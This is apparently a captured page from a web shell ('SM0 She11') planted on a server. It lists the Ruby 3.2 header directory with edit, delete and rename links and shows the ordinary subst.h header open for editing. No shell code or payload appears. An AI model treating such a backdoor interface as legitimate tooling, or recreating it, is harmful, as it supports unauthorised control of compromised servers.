SM0 She11
Path:
/
/
opt
/
alt
/
ruby32
/
include
/
ruby
Full Path (server): /opt/alt/ruby32/include/ruby
Create Fil3
Upl04d Fil3
📄 assert.h
[E]
[D]
[R]
📄 atomic.h
[E]
[D]
[R]
📁 backward
Open
[D]
[R]
📄 backward.h
[E]
[D]
[R]
📄 config-x86_64.h
[E]
[D]
[R]
📄 config.h
[E]
[D]
[R]
📄 debug.h
[E]
[D]
[R]
📄 defines.h
[E]
[D]
[R]
📄 digest.h
[E]
[D]
[R]
📄 encoding.h
[E]
[D]
[R]
📁 fiber
Open
[D]
[R]
📄 intern.h
[E]
[D]
[R]
📁 internal
Open
[D]
[R]
📁 io
Open
[D]
[R]
📄 io.h
[E]
[D]
[R]
📄 memory_view.h
[E]
[D]
[R]
📄 missing.h
[E]
[D]
[R]
📄 onigmo.h
[E]
[D]
[R]
📄 oniguruma.h
[E]
[D]
[R]
📄 ractor.h
[E]
[D]
[R]
📄 random.h
[E]
[D]
[R]
📄 re.h
[E]
[D]
[R]
📄 regex.h
[E]
[D]
[R]
📄 ruby.h
[E]
[D]
[R]
📄 st.h
[E]
[D]
[R]
📄 subst.h
[E]
[D]
[R]
📄 thread.h
[E]
[D]
[R]
📄 thread_native.h
[E]
[D]
[R]
📄 util.h
[E]
[D]
[R]
📄 version.h
[E]
[D]
[R]
📄 vm.h
[E]
[D]
[R]
Editing: subst.h
#ifndef RUBY_SUBST_H /*-*-C++-*-vi:se ft=cpp:*/ #define RUBY_SUBST_H 1 /** * @author Ruby developers <ruby-core@ruby-lang.org> * @copyright This file is a part of the programming language Ruby. * Permission is hereby granted, to either redistribute and/or * modify this file, provided that the conditions mentioned in the * file COPYING are met. Consult the file for details. */ #undef snprintf #undef vsnprintf #define snprintf ruby_snprintf #define vsnprintf ruby_vsnprintf #ifdef BROKEN_CLOSE #undef getpeername #define getpeername ruby_getpeername #undef getsockname #define getsockname ruby_getsockname #undef shutdown #define shutdown ruby_shutdown #undef close #define close ruby_close #endif #endif
Save